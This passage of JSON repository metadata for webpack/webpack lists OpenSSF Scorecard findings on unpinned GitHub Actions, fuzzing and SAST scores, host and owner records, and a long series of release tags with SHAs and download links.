https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts